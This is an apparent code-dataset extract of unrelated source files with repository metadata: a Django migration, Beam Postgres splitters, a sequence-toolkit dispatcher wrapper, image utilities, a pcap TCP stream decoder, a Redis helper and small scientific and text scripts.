|
0bc47f3cf6f403101082f201c7fd1ca8108d5731
|
[
"MIT"
] | 4
|
2018-03-12T23:49:01.000Z
|
2020-07-06T17:37:29.000Z
|
core/migrations/0044_auto_20190510_0921.py
|
raheemazeezabiodun/art-backend
|
0bc47f3cf6f403101082f201c7fd1ca8108d5731
|
[
"MIT"
] | 259
|
2018-02-06T07:53:07.000Z
|
2020-06-05T19:18:32.000Z
|
core/migrations/0044_auto_20190510_0921.py
|
raheemazeezabiodun/art-backend
|
0bc47f3cf6f403101082f201c7fd1ca8108d5731
|
[
"MIT"
] | 22
|
2018-01-25T14:02:05.000Z
|
2020-06-24T20:37:01.000Z
|
# Generated by Django 2.1.7 on 2019-05-10 09:21
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('core', '0043_auto_20190424_1029'),
]
operations = [
migrations.RemoveField(
model_name='statetransition',
name='state',
),
migrations.AddField(
model_name='statetransition',
name='asset_state_from_report',
field=models.CharField(choices=[('requires repair', 'requires repair'), ('requires external assessment', 'requires external assessment'), ('Damaged', 'Damaged')], default='requires repair', max_length=50),
),
migrations.AddField(
model_name='statetransition',
name='incident_report_state',
field=models.CharField(choices=[('newly reported', 'newly reported'), ('internal assessment', 'internal assessment'), ('external assessment', 'external assessment'), ('out for repair', 'out for repair')], default='newly reported', max_length=50),
),
]
| 38.142857
| 258
| 0.634831
| 975
| 0.912921
| 0
| 0
| 0
| 0
| 0
| 0
| 477
| 0.446629
|
0b4772665a5a43688e79771eafbcfa9e4db57a1a
| 6,661
|
py
|
Python
|
postgres_connector/splitters.py
|
sandboxws/beam-postgres-connector
|
d08ed08e96991704fc234dd1e4d2ddf13f1885c1
|
[
"MIT"
] | null | null | null |
postgres_connector/splitters.py
|
sandboxws/beam-postgres-connector
|
d08ed08e96991704fc234dd1e4d2ddf13f1885c1
|
[
"MIT"
] | null | null | null |
postgres_connector/splitters.py
|
sandboxws/beam-postgres-connector
|
d08ed08e96991704fc234dd1e4d2ddf13f1885c1
|
[
"MIT"
] | null | null | null |
import re
from abc import ABCMeta, abstractmethod
from datetime import datetime
from typing import Callable, Iterator
from apache_beam.io import iobase
from apache_beam.io.range_trackers import (LexicographicKeyRangeTracker,
OffsetRangeTracker,
UnsplittableRangeTracker)
from dateutil.relativedelta import relativedelta
class BaseSplitter(metaclass=ABCMeta):
"""Splitters abstract class."""
def build_source(self, source):
"""Build source on runtime."""
self.source = source
@abstractmethod
def estimate_size(self):
"""Wrap :class:`~apache_beam.io.iobase.BoundedSource.estimate_size`"""
raise NotImplementedError()
@abstractmethod
def get_range_tracker(self, start_position, stop_position):
"""Wrap :class:`~apache_beam.io.iobase.BoundedSource.get_range_tracker`"""
raise NotImplementedError()
@abstractmethod
def read(self, range_tracker):
"""Wrap :class:`~apache_beam.io.iobase.BoundedSource.read`"""
raise NotImplementedError()
def split(self, desired_bundle_size, start_position=None, stop_position=None):
"""Wrap :class:`~apache_beam.io.iobase.BoundedSource.split`"""
raise NotImplementedError()
class DateSplitter(BaseSplitter):
"""Split bounded source by dates."""
pass
class IdsSplitter(BaseSplitter):
"""Split bounded source by any ids."""
def __init__(self, generate_ids_fn: Callable[[], Iterator], batch_size: int = 1000000):
self._generate_ids_fn = generate_ids_fn
self._batch_size = batch_size
def estimate_size(self):
# TODO: unify the method of estimating
return 0
def get_range_tracker(self, start_position, stop_position):
self._validate_query()
return LexicographicKeyRangeTracker(start_position, stop_position)
def read(self, range_tracker):
if range_tracker.start_position() is None:
ids = ",".join([f"'{id}'" for id in self._generate_ids_fn()])
else:
ids = range_tracker.start_position()
query = self.source.query.format(ids=ids)
for record in self.source.client.record_generator(query):
yield record
def split(self, desired_bundle_size, start_position=None, stop_position=None):
self._validate_query()
ids = []
for generated_id in self._generate_ids_fn():
ids.append(generated_id)
if len(ids) == self._batch_size:
yield self._create_bundle_source(desired_bundle_size, self.source, ids)
ids.clear()
yield self._create_bundle_source(desired_bundle_size, self.source, ids)
def _validate_query(self):
condensed_query = self.source.query.lower().replace(" ", "")
if re.search(r"notin\({ids}\)", condensed_query):
raise ValueError(f"Not support 'not in' phrase: {self.source.query}")
if not re.search(r"in\({ids}\)", condensed_query):
example = "SELECT * FROM tests WHERE id IN ({ids})"
raise ValueError(f"Require 'in' phrase and 'ids' key on query: {self.source.query}, e.g. '{example}'")
@staticmethod
def _create_bundle_source(desired_bundle_size, source, ids):
if isinstance(ids, list):
ids_str = ",".join([f"'{id}'" for id in ids])
elif isinstance(ids, str):
ids_str = ids
else:
raise ValueError(f"Unexpected ids: {ids}")
return iobase.SourceBundle(
weight=desired_bundle_size, source=source, start_position=ids_str, stop_position=None
)
class LimitOffsetSplitter(BaseSplitter):
"""Split bounded source by limit and offset."""
def __init__(self, batch_size: int = 1000000):
self._batch_size = batch_size
self._counts = 0
def estimate_size(self):
self._counts = self.source.client.counts_estimator(self.source.query)
return self._counts
def get_range_tracker(self, start_position, stop_position):
if self._counts == 0:
self._counts = self.source.client.counts_estimator(self.source.query)
if start_position is None:
start_position = 0
if stop_position is None:
stop_position = self._counts
return LexicographicKeyRangeTracker(start_position, stop_position)
def read(self, range_tracker):
offset, limit = range_tracker.start_position(), range_tracker.stop_position()
query = f"SELECT * FROM ({self.source.query}) as subq LIMIT {limit} OFFSET {offset}"
for record in self.source.client.record_generator(query):
yield record
def split(self, desired_bundle_size, start_position=None, stop_position=None):
if self._counts == 0:
self._counts = self.source.client.counts_estimator(self.source.query)
if start_position is None:
start_position = 0
if stop_position is None:
stop_position = self._counts
last_position = 0
for offset in range(start_position, stop_position, self._batch_size):
yield iobase.SourceBundle(
weight=desired_bundle_size, source=self.source, start_position=offset, stop_position=self._batch_size
)
last_position = offset + self._batch_size
yield iobase.SourceBundle(
weight=desired_bundle_size,
source=self.source,
start_position=last_position + 1,
stop_position=stop_position,
)
class NoSplitter(BaseSplitter):
"""No split bounded source so not work parallel."""
def estimate_size(self):
return self.source.client.rough_counts_estimator(self.source.query)
def get_range_tracker(self, start_position, stop_position):
if start_position is None:
start_position = 0
if stop_position is None:
stop_position = OffsetRangeTracker.OFFSET_INFINITY
return UnsplittableRangeTracker(OffsetRangeTracker(start_position, stop_position))
def read(self, range_tracker):
for record in self.source.client.record_generator(self.source.query):
yield record
def split(self, desired_bundle_size, start_position=None, stop_position=None):
if start_position is None:
start_position = 0
if stop_position is None:
stop_position = OffsetRangeTracker.OFFSET_INFINITY
yield iobase.SourceBundle(
weight=desired_bundle_size, source=self.source, start_position=start_position, stop_position=stop_position
)
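# A minimal usage sketch (ids and batch size are illustrative): IdsSplitter
# requires the source query to contain an "in ({ids})" clause, as
# _validate_query enforces, e.g. "SELECT * FROM tests WHERE id IN ({ids})".
def example_ids_splitter():
    return IdsSplitter(
        generate_ids_fn=lambda: iter(["1", "2", "3"]),
        batch_size=2,
    )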
| 37.632768
| 118
| 0.664465
| 6,242
| 0.937097
| 2,523
| 0.378772
| 958
| 0.143822
| 0
| 0
| 874
| 0.131212
|
0b479dbf807c903d09638149ff0de16acee169e3
| 5,827
|
py
|
Python
|
apis/python_interface_helpers/stk_env.py
|
davetrollope-fsml/sequence_toolkit
|
49495f679aad1d7c134cf8a189cca1e8acc9f4bd
|
[
"MIT"
] | null | null | null |
apis/python_interface_helpers/stk_env.py
|
davetrollope-fsml/sequence_toolkit
|
49495f679aad1d7c134cf8a189cca1e8acc9f4bd
|
[
"MIT"
] | null | null | null |
apis/python_interface_helpers/stk_env.py
|
davetrollope-fsml/sequence_toolkit
|
49495f679aad1d7c134cf8a189cca1e8acc9f4bd
|
[
"MIT"
] | null | null | null |
from stk_sequence import *
from stk_tcp_server import *
from stk_tcp_client import *
from stk_data_flow import *
from stk_options import stk_clear_cb
import time
class stk_callback:
def __init__(self):
self._caller = None
self._mapobj = None
pass
def add_callback_ref(self,caller):
self._caller = caller
def del_callback_ref(self,caller):
if self._caller:
self._caller.delCallback()
def add_callback_map_obj(self,mapobj):
self._mapobj = mapobj
def map_obj(self):
return self._mapobj
def close(self):
if self._caller:
self.del_callback_ref(self._caller)
self._caller = None
def caller(self):
return self._caller
def fd_created(self,df,fd):
pass
def fd_destroyed(self,df,fd):
pass
class stk_dispatcher_cb(stk_dispatch_cb_class):
def __init__(self,env,cbcls):
self.dispatchclass = stk_dispatch_cb_class.__init__(self)
self._cbcls = cbcls
self._env = env
def close(self):
#del self.dispatchclass
#self.dispatchclass = None
#del self.__class__.obj_map[stk_get_service_group_id(self._svcgrp)]
pass
def finddf(self,dfptr):
dfref = stk_ulong_df_to_df_ptr(dfptr)
df = stk_data_flow.find(dfptr)
if df == None:
dftype = stk_data_flow.type(dfptr)
if dftype == STK_TCP_ACCEPTED_FLOW or dftype == STK_TCP_SERVER_FLOW:
df = stk_tcp_server(self._env,None,None,None,dfref)
if dftype == STK_TCP_CLIENT_FLOW:
df = stk_tcp_client(self._env,None,None,None,dfref)
return df
def process_data(self,dfptr,seqptr):
seqref = stk_ulong_seq_to_seq_ptr(seqptr)
seq = stk_sequence.find(seqptr)
if seq == None:
seq = stk_sequence(self._env,None,None,0,0,None,seqref)
# the dfptr here is actually the C pointer converted to a ulong
df = self.finddf(dfptr)
self._cbcls.process_data(df,seq)
seq.unmap()
def process_name_response(self,dfptr,seqptr):
seqref = stk_ulong_seq_to_seq_ptr(seqptr)
seq = stk_sequence.find(seqptr)
if seq == None:
seq = stk_sequence(self._env,None,None,0,0,None,seqref)
# the dfptr here is actually the C pointer converted to a ulong
df = self.finddf(dfptr)
self._cbcls.process_name_response(df,seq)
seq.unmap()
pass
def process_monitoring_response(self,dfptr,seqptr):
pass
def fd_created(self,dfptr,fd):
# the dfptr here is actually the C pointer converted to a ulong
dfref = stk_ulong_df_to_df_ptr(dfptr)
df = stk_data_flow.find(dfptr)
if df == None:
# This sucks....
dftype = stk_data_flow.type(dfptr)
if dftype == STK_TCP_ACCEPTED_FLOW or dftype == STK_TCP_SERVER_FLOW:
df = stk_tcp_server(self._env,None,None,None,dfref)
# Err, UDP doesn't actually have connections so this really
# isn't likely to be needed - why would the app care about udp creations?
#elif dftype == STK_UDP_CLIENT_FLOW:
#df = stk_udp_client(self._env,None,None,None,dfref)
if df:
self._cbcls.fd_created(df,fd)
def fd_destroyed(self,dfptr,fd):
# the dfptr here is actually the C pointer converted to a ulong
dfref = stk_ulong_df_to_df_ptr(dfptr)
df = stk_data_flow.find(dfptr)
if df == None:
dftype = stk_data_flow.type(dfptr)
if dftype == STK_TCP_ACCEPTED_FLOW or dftype == STK_TCP_SERVER_FLOW:
df = stk_tcp_server(self._env,None,None,None,dfref)
if df:
self._cbcls.fd_destroyed(df,fd)
class stk_env:
def __init__(self,envopts):
self.caller = stk_dispatch_cb_caller()
envopts.append_dispatcher(self.caller.get_dispatcher())
self._opts = envopts
self._env = stk_create_env(envopts.ref())
        self._dispatcher_stopped = False
def close(self):
if self._env:
if self._opts:
stk_clear_cb(self._opts.ref(),"dispatcher")
if self.caller:
self.caller.detach_env(self._env)
stk_destroy_env(self._env)
if self.caller:
self.caller.close()
self.caller = None
self._env = None
def ref(self):
return self._env
def get_name_service(self):
return stk_env_get_name_service(self.ref())
def dispatch_timer_pools(self,interval):
stk_env_dispatch_timer_pools(self._env,interval)
def listening_dispatcher(self,df,svcgrp,appcb):
appcb.add_callback_ref(self.caller)
self._dispatcher_stopped = False
if self.caller.env_listening_dispatcher_add_fd(df.ref()) < 0:
return
while self._dispatcher_stopped == False:
self.caller.env_listening_dispatcher(df.ref(),stk_dispatcher_cb(self,appcb).__disown__(),200)
self.caller.env_listening_dispatcher_del_fd(df.ref())
def client_dispatcher_timed(self,appcb,timeout):
if appcb:
appcb.add_callback_ref(self.caller)
self.caller.env_client_dispatcher_timed(self._env,timeout,stk_dispatcher_cb(self,appcb).__disown__())
else:
self.caller.env_client_dispatcher_timed(self._env,timeout,None)
def stop_dispatcher(self):
        self._dispatcher_stopped = True
self.caller.env_stop_dispatching(self._env)
time.sleep(.2)
def terminate_dispatcher(self):
self.caller.env_terminate_dispatcher(self._env)
@classmethod
def append_name_server_dispatcher_cbs(cls,envopts,data_flow_group):
nsopts = envopts.find_option("name_server_options")
nsopts.update_ref(stk_append_name_server_fd_cbs(data_flow_group,nsopts.ref()))
@classmethod
def remove_name_server_dispatcher_cbs(cls,envopts,data_flow_group):
dfopts = envopts.find_option(data_flow_group + "_options")
if dfopts != None:
dfopts.remove_dispatcher_fd_cbs()
else:
envopts.remove_dispatcher_fd_cbs()
@classmethod
def append_monitoring_dispatcher_cbs(cls,envopts,data_flow_group):
envopts.update_ref(stk_append_monitoring_fd_cbs(data_flow_group,envopts.ref()))
@classmethod
def remove_monitoring_dispatcher_cbs(cls,envopts,data_flow_group):
dfopts = envopts.find_option(data_flow_group + "_options")
if dfopts != None:
dfopts.remove_dispatcher_fd_cbs()
@classmethod
def log(cls,level,message):
stk_log(level,message)
@classmethod
def debug(cls,component,message):
stk_debug(component,message)
| 34.276471
| 104
| 0.763686
| 5,658
| 0.970997
| 0
| 0
| 967
| 0.165952
| 0
| 0
| 657
| 0.112751
|
0b47c0ccbeb35e2ac408d98bd973b27910abd4c8
| 1,163
|
py
|
Python
|
readfile.py
|
y-azvd/perceptron
|
3cd4cefc7ae54bd8a3df702300ee9797389fef4a
|
[
"MIT"
] | null | null | null |
readfile.py
|
y-azvd/perceptron
|
3cd4cefc7ae54bd8a3df702300ee9797389fef4a
|
[
"MIT"
] | null | null | null |
readfile.py
|
y-azvd/perceptron
|
3cd4cefc7ae54bd8a3df702300ee9797389fef4a
|
[
"MIT"
] | null | null | null |
import numpy as np
##
## @brief Reads a CSV file, skipping lines that start with '#'.
##
## @param filename The filename
##
## @return a list of rows (each a list of stripped column strings),
## or -1 on error
##
def readfile(filename):
csvfile = open(filename, "r")
if not csvfile:
print "error"
return -1
rows = []
for row in csvfile:
        if row[0] != '#':  # lines starting with '#' are comments
row = row.strip() # removes white space around non white space
cols = row.split(',') # splits by any white space
            cols = [col.strip() for col in cols if col.strip() != '']  # drop empty columns
rows.append(cols)
csvfile.close()
return rows
##
## @brief Reads for perceptron.
##
## @param filename The filename
## @param dataType The data type
##
## @return (features, featuresClassifications) as numpy arrays
##
def readForPerceptron(filename, dataType):
content = readfile(filename)
features = np.asarray(content, dtype=dataType)
# classifications for each feature entry/vector/array
# np.asarray modifies array on place.
featuresClassifications = np.array(features[:, -1])
# changes the classification for the bias entry to 1
features[:, -1] = 1
return features, featuresClassifications
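# A minimal usage sketch; 'train.csv' is a hypothetical file whose rows hold
# numeric features with the class label in the last column.
def example(filename='train.csv'):
    features, labels = readForPerceptron(filename, float)
    return features, labels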
| 23.26
| 71
| 0.674119
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 568
| 0.488392
|
0b49a43a85fb689276b933c981268752b4780e5f
| 3,255
|
py
|
Python
|
utils.py
|
SappieKonig/eind-practicum
|
d6ef30d233706812334a52b618f4ae00380ba3b7
|
[
"MIT"
] | null | null | null |
utils.py
|
SappieKonig/eind-practicum
|
d6ef30d233706812334a52b618f4ae00380ba3b7
|
[
"MIT"
] | null | null | null |
utils.py
|
SappieKonig/eind-practicum
|
d6ef30d233706812334a52b618f4ae00380ba3b7
|
[
"MIT"
] | null | null | null |
import numpy as np
import cv2 as cv
import os
import shutil
from skimage.util.shape import view_as_windows
import torch.nn.functional as F
import torch
from functools import lru_cache
@lru_cache(maxsize=None)
def get_exp_decay_filter(filter_size=1, decay=.9, avg=True):
side = 2 * filter_size + 1
filter = torch.ones((side, side))
for i in range(side):
for j in range(side):
filter[i, j] *= decay ** (((filter_size - i) ** 2 + (filter_size - j) ** 2) ** 0.5)
if avg:
filter /= torch.sum(filter)
return filter
def accentuate_color(distance):
return -5*distance**2
def color_distance(frames, color, channel_weights=(1, 1, 1)):
channel_weights = np.array(channel_weights)
color = torch.from_numpy(np.reshape(color, (1, 1, 1, 3))).to(frames.device).float()
color = color / torch.sum(color ** 2) ** .5
frames = frames - color
frames = frames ** 2
frames = frames * torch.from_numpy(channel_weights).to(frames.device).view(1, 1, 1, 3).float()
frames = torch.sum(frames, dim=-1) ** .5
return frames
def normalize_colors(frame):
return frame / torch.sum((frame+1) ** 2, dim=-1, keepdim=True) ** .5
def filter_image(frames, filter_size=1, decay=.9, avg=True):
filter = get_exp_decay_filter(filter_size, decay, avg).to(frames.device)
return F.conv2d(frames, filter.view(1, 1, filter.shape[0], filter.shape[1]),
padding=filter_size)
def accentuation_pipeline(frames, color, channel_weights=(1, 1, 1)):
frames = normalize_colors(frames)
frames = color_distance(frames, color, channel_weights)
frames = accentuate_color(frames)
# add channel dimension
frames = torch.unsqueeze(frames, dim=1)
for i in range(4):
frames = filter_image(frames, decay=.9, avg=True)
frames = frames - torch.amax(frames, dim=(1, 2, 3), keepdim=True)
frames = torch.exp(frames * 5)
frames = project_image_to_u8(frames)
return frames
def localization_pipeline(img, color, channel_weights=(1, 1, 1)):
return get_positions(accentuation_pipeline(img, color, channel_weights))
def save(frames, fps=30, dir='movie.mp4'):
try:
os.mkdir('dump')
except FileExistsError:
pass
for i, frame in enumerate(frames):
cv.imwrite(f'dump/img{i:0>5}.png', frame)
os.system(f"ffmpeg -r {fps} -start_number 0 -i /home/sappie/PycharmProjects/DoublePendulum/dump/img%05d.png"
f" -vcodec mpeg4 -y {dir}")
shutil.rmtree('./dump')
def project_image_to_u8(frames):
frames *= 255
return frames.to(torch.uint8)
def get_positions(frame):
return np.unravel_index(np.argmax(frame), frame.shape)
def extract_position_pipeline(frames, stride):
frames = torch.unsqueeze(frames, dim=1)
filter = torch.zeros((31, 31)).to(frames.device) - .3
filter[5:26, 5:26] = get_exp_decay_filter(10, decay=.9, avg=False)
filter /= torch.sum(torch.abs(filter))
frames = F.conv2d(frames, filter.view(1, 1, filter.shape[0], filter.shape[1]),
padding=len(filter) // 2, stride=stride)
positions = torch.argmax(frames.view((frames.shape[0], -1)), dim=1)
y, x = positions // frames.shape[3], positions % frames.shape[3]
return x, y
| 31.601942
| 112
| 0.663902
| 0
| 0
| 0
| 0
| 372
| 0.114286
| 0
| 0
| 194
| 0.059601
|
0b4a7fb8ebee09432022b77e8750863d12e69e9f
| 134
|
py
|
Python
|
python/pangram.py
|
emiliot/hackerrank
|
7a3081f6b0a33f8402c63b94a6a54728a9adf47e
|
[
"MIT"
] | null | null | null |
python/pangram.py
|
emiliot/hackerrank
|
7a3081f6b0a33f8402c63b94a6a54728a9adf47e
|
[
"MIT"
] | null | null | null |
python/pangram.py
|
emiliot/hackerrank
|
7a3081f6b0a33f8402c63b94a6a54728a9adf47e
|
[
"MIT"
] | null | null | null |
s = input().strip()
res = [c for c in set(s.lower()) if c.isalpha()]
if len(res) == 26:
print("pangram")
else:
print("not pangram")
| 19.142857
| 48
| 0.604478
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 22
| 0.164179
|
0b4ac3436bf4854bb94f737d096d1fe630a754a3
| 8,423
|
py
|
Python
|
stream.py
|
ccgcyber/xpcap
|
a0e6fd1355fd0a9cbff4e074275b236ce8c6c3b8
|
[
"MIT"
] | 5
|
2017-07-31T02:07:05.000Z
|
2021-02-14T16:39:49.000Z
|
stream.py
|
ccgcyber/xpcap
|
a0e6fd1355fd0a9cbff4e074275b236ce8c6c3b8
|
[
"MIT"
] | null | null | null |
stream.py
|
ccgcyber/xpcap
|
a0e6fd1355fd0a9cbff4e074275b236ce8c6c3b8
|
[
"MIT"
] | 4
|
2016-07-24T08:56:54.000Z
|
2020-07-12T11:50:02.000Z
|
from __future__ import print_function
import pkgutil
import stream_decoders
# This module decodes stream-based protocols and resolves retransmissions.
decoders= []
# __path__ is used to find the location of all decoder submodules
for impimp, name, ii in pkgutil.iter_modules(stream_decoders.__path__):
impload= impimp.find_module(name)
decoders.append(impload.load_module(name).toplevel)
import math
import time
import struct
def addrstring(*args):
if len(args)==1 and type(args[0])==tuple:
# from getaddr
args= args[0]
if len(args)==0:
raise Exception("no addr")
addr= args[0]
if len(addr)==4:
addr= ".".join(map(lambda x:str(x), struct.unpack("4B", addr)))
elif len(addr)==16:
addr= ":".join(map(lambda x:"%04x"%x if x else "", struct.unpack(">8H", addr)))
else:
raise Exception("invalid addr")
if len(args)==1:
return addr
elif len(args)==2:
return addr+"."+str(args[1])
else:
raise Exception("addr: too many items")
def getaddr(ctx, frm):
# ipaddr
if hasattr(ctx, frm):
return getattr(ctx, frm)
# ipaddr + portnum
for proto in ("udp", "tcp"):
if hasattr(ctx, proto):
return getattr(ctx.ip, frm), getattr(getattr(ctx, proto), frm)
# ipaddr
return getattr(ctx.ip, frm)
def pkttag(ip, p):
if p.src < p.dst:
return "%s:%s" % (addrstring(ip.dst, p.dst), addrstring(ip.src, p.src))
elif p.src > p.dst:
return "%s:%s" % (addrstring(ip.src, p.src), addrstring(ip.dst, p.dst))
elif ip.src < ip.dst:
return "%s:%s" % (addrstring(ip.dst, p.dst), addrstring(ip.src, p.src))
else:
return "%s:%s" % (addrstring(ip.src, p.src), addrstring(ip.dst, p.dst))
def pktprefix(ip, p):
if p.src < p.dst:
return "%s < %s" % (addrstring(ip.dst, p.dst), addrstring(ip.src, p.src))
elif p.src > p.dst:
return "%s > %s" % (addrstring(ip.src, p.src), addrstring(ip.dst, p.dst))
elif ip.src < ip.dst:
return "%s < %s" % (addrstring(ip.dst, p.dst), addrstring(ip.src, p.src))
else:
return "%s > %s" % (addrstring(ip.src, p.src), addrstring(ip.dst, p.dst))
def tsformat(ts):
f, n= math.modf(ts)
return time.strftime("%H:%M:%S", time.localtime(n))+("%.6f" % f)[1:]
class StreamAutoDetect:
def __init__(self):
self.data= {}
self.decoder= None
# todo for 'src' pass: 'clt', 'svr' + clt+svr addr:ports
def handle(self, src, data, ofs, last):
if self.decoder:
return self.decoder.handle(src, data, ofs, last)
if src in self.data:
data = self.data[src] + data[ofs:last]
ofs, last= 0, len(data)
# try to determine what decoder to use
for cls in decoders:
# todo: pass both svr+clt traffic to isvaliddata.
if cls.isvaliddata(data, ofs, last):
if src in self.data:
del self.data[src]
self.setdecoder(cls, src, data, ofs, last)
return
def setdecoder(self, cls, src, sdata, ofs, last):
self.decoder= cls(self)
# first forward older data
for s, ddata in self.data.items():
o= self.decoder.handle(s, ddata, 0, len(ddata))
# todo: resulting ofs
del self.data[s]
if o<len(ddata):
print("stream WARN: ddata remaining: %s" % (ddata[o:].encode("hex")))
# then forward this data
ofs= self.decoder.handle(src, sdata, ofs, last)
# todo: optionally clear data
#self.data[src]= sdata
if ofs<last:
print("stream WARN: sdata remaining: %s" % (sdata[ofs:].encode("hex")))
def handlegap(self, src, size):
pass
#print("gap: %d" % size)
class StreamDecoder:
def __init__(self):
self.seq= {}
self.cur= {}
self.protocol = StreamAutoDetect()
self.totalgap = 0
self.seqmap= {}
def __del__(self):
if any(len(x) for x in self.seqmap.values()):
#print("seq: ", self.seq)
#print("cur: ", self.cur)
#print("map: ", self.seqmap)
pass
@staticmethod
def tcpflags(tcp):
f= ""
if tcp.URG: f+="U"
if tcp.ACK: f+="A"
if tcp.PSH: f+="P"
if tcp.RST: f+="R"
if tcp.SYN: f+="S"
if tcp.FIN: f+="F"
return f
# handle without packet reordering
# ... this is currently not used, see 'reorder'
def handle(self, ctx):
src= addrstring(getaddr(ctx, "src"))
dst= addrstring(getaddr(ctx, "dst"))
if not src in self.seq:
self.seq[src]= ctx.tcp.seq
if not dst in self.seq and ctx.tcp.ack:
self.seq[dst]= ctx.tcp.ack
f= self.tcpflags(ctx.tcp)
skip= 0
extra= ctx.tcp.FIN or ctx.tcp.SYN
endseq= ctx.tcp.seq + len(ctx.tcp.payload)+extra
if not src in self.cur:
self.cur[src]= ctx.tcp.seq
elif self.cur[src] < ctx.tcp.seq:
#print("GAP: %08x-%08x" % (self.cur[src], ctx.tcp.seq))
self.totalgap += ctx.tcp.seq-self.cur[src]
elif self.cur[src] > ctx.tcp.seq:
#print("OVERLAP: %08x-%08x" % (ctx.tcp.seq, self.cur[src]))
# handle retransmit
skip= self.cur[src] - ctx.tcp.seq
if ctx.tcp.payload and self.totalgap:
self.protocol.handlegap(src, self.totalgap)
self.totalgap= 0
#seqnr= "[%08x]" % ctx.tcp.seq-self.seq[src]
seqnr= "[%08x-%08x:%08x]" % (ctx.tcp.seq, endseq, ctx.tcp.ack)
print("%s TCP %-45s %s%-2s %s" % (tsformat(ctx.pcap.ts), pktprefix(ctx.ip, ctx.tcp),
seqnr, f, ctx.tcp.payload.encode("hex")))
if skip < len(ctx.tcp.payload):
self.protocol.handle(src, ctx.tcp.payload, skip, len(ctx.tcp.payload))
elif len(ctx.tcp.payload):
print("dropped")
self.cur[src] = endseq
# handle with packet reordering
def reorder(self, ctx):
src= addrstring(getaddr(ctx, "src"))
dst= addrstring(getaddr(ctx, "dst"))
# if any(len(x) for x in self.seqmap.values()):
# print(self.seqmap)
# save all pkts in seqmap
if not src in self.seqmap:
self.seqmap[src]= {}
self.seqmap[src][ctx.tcp.seq]= ctx
# then try to process pkts
for k in sorted(self.seqmap[src].keys()):
ctx= self.seqmap[src][k]
if not src in self.seq:
self.seq[src]= ctx.tcp.seq
if not dst in self.seq and ctx.tcp.ack:
self.seq[dst]= ctx.tcp.ack
f= self.tcpflags(ctx.tcp)
skip= 0
extra= ctx.tcp.FIN or ctx.tcp.SYN
endseq= ctx.tcp.seq + len(ctx.tcp.payload)+extra
if not src in self.cur:
self.cur[src]= ctx.tcp.seq
elif self.cur[src] < ctx.tcp.seq:
# gap -> output later
# todo: on FIN: do forward gapped data to protocol.handler.
##print("gap %d" % (ctx.tcp.seq-self.cur[src]))
break
elif self.cur[src] > ctx.tcp.seq:
#print("OVERLAP: %08x-%08x" % (ctx.tcp.seq, self.cur[src]))
# handle retransmit
skip= self.cur[src] - ctx.tcp.seq
##print("retransmitted %d" % skip)
# todo: detect server/client direction
# client: SYN has ctx.tcp.ack==0
# server: SYN has ctx.tcp.ack!=0
#seqnr= "[%08x]" % ctx.tcp.seq-self.seq[src]
seqnr= "[%08x-%08x %08x]" % (ctx.tcp.seq, endseq, ctx.tcp.ack)
print("%s TCP %-45s %s%-2s" % (tsformat(ctx.pcap.ts), pktprefix(ctx.ip, ctx.tcp),
seqnr, f))
if skip < len(ctx.tcp.payload):
# todo: pass server/client flag + source/dest ports
self.protocol.handle(src, ctx.tcp.payload, skip, len(ctx.tcp.payload))
self.cur[src] = endseq
del self.seqmap[src][k]
class StreamManager:
def __init__(self):
self.streams= {}
def handle(self, ctx):
tag= pkttag(ctx.ip, ctx.tcp)
if not tag in self.streams:
self.streams[tag]= StreamDecoder()
self.streams[tag].reorder(ctx)
| 32.396154
| 93
| 0.544343
| 6,089
| 0.722902
| 0
| 0
| 229
| 0.027187
| 0
| 0
| 1,793
| 0.21287
|
0b4afb977af41e7750f169c98501350be4fa6ae6
| 247
|
py
|
Python
|
app/db/connection.py
|
melhin/streamchat
|
8a3e7ffdcf4bc84045df71259556f4267a755351
|
[
"MIT"
] | null | null | null |
app/db/connection.py
|
melhin/streamchat
|
8a3e7ffdcf4bc84045df71259556f4267a755351
|
[
"MIT"
] | 3
|
2020-09-16T13:30:17.000Z
|
2020-09-19T09:56:50.000Z
|
app/db/connection.py
|
melhin/streamchat
|
8a3e7ffdcf4bc84045df71259556f4267a755351
|
[
"MIT"
] | null | null | null |
import logging
import aioredis
from app.core.config import REDIS_DSN, REDIS_PASSWORD
logger = logging.getLogger(__name__)
async def get_redis_pool():
    # aioredis v1 API (removed in aioredis 2.x in favour of from_url); note that
    # despite this function's name, create_redis returns a single connection --
    # create_redis_pool would return an actual pool
    return await aioredis.create_redis(REDIS_DSN, encoding='utf-8', password=REDIS_PASSWORD)
| 22.454545
| 92
| 0.805668
| 0
| 0
| 0
| 0
| 0
| 0
| 120
| 0.48583
| 7
| 0.02834
|
0b4cc6aa957df616a9c14313fa9b9ee7ec6d0837
| 1,434
|
py
|
Python
|
calculators/static_dipolar_couplings/dcc.py
|
jlorieau/nmr
|
15224342a9277da8b02e10027644c86ac3769db1
|
[
"MIT"
] | null | null | null |
calculators/static_dipolar_couplings/dcc.py
|
jlorieau/nmr
|
15224342a9277da8b02e10027644c86ac3769db1
|
[
"MIT"
] | null | null | null |
calculators/static_dipolar_couplings/dcc.py
|
jlorieau/nmr
|
15224342a9277da8b02e10027644c86ac3769db1
|
[
"MIT"
] | null | null | null |
from math import pi
u0 = 4.*pi*1E-7 # T m /A
hbar = 1.0545718E-34 # J s
# 1 T = kg s^-2 A-1 = J A^-1 m^-2
g = {
'1H' : 267.513E6, # rad T^-1 s^-1
'13C': 67.262E6,
'15N': -27.116E6,
'e': 176086E6
}
# nuc_i, nuc_j: nucleus string. ex: '1H'
# r_ij: distance in Angstroms
DCC = lambda nuc_i, nuc_j, r_ij: -1.*(u0*g[nuc_i]*g[nuc_j]*hbar)/(4.*pi*(r_ij*1E-10)**3)
print('-'*30)
print('1H-15N (1.02A): {:> 8.1f} Hz'.format(DCC('1H','15N', 1.02)/(2.*pi)))
print('1H-15N (1.04A): {:> 8.1f} Hz'.format(DCC('1H','15N', 1.04)/(2.*pi)))
print('-'*30)
print('1H-13C (1.1A): {:> 8.1f} Hz'.format(DCC('1H','13C', 1.1)/(2.*pi)))
print('-'*30)
print('1H-1H (1.00A): {:> 8.1f} Hz'.format(DCC('1H','1H', 1.0)/(2.*pi)))
print('1H-1H (2.4A): {:> 8.1f} Hz'.format(DCC('1H','1H', 2.4)/(2.*pi)))
print('1H-1H (2.8A): {:> 8.1f} Hz'.format(DCC('1H','1H', 2.8)/(2.*pi)))
print('-'*30)
print('13C-13C (1.53A): {:> 8.1f} Hz'.format(DCC('13C','13C', 1.53)/(2.*pi)))
print('-'*30)
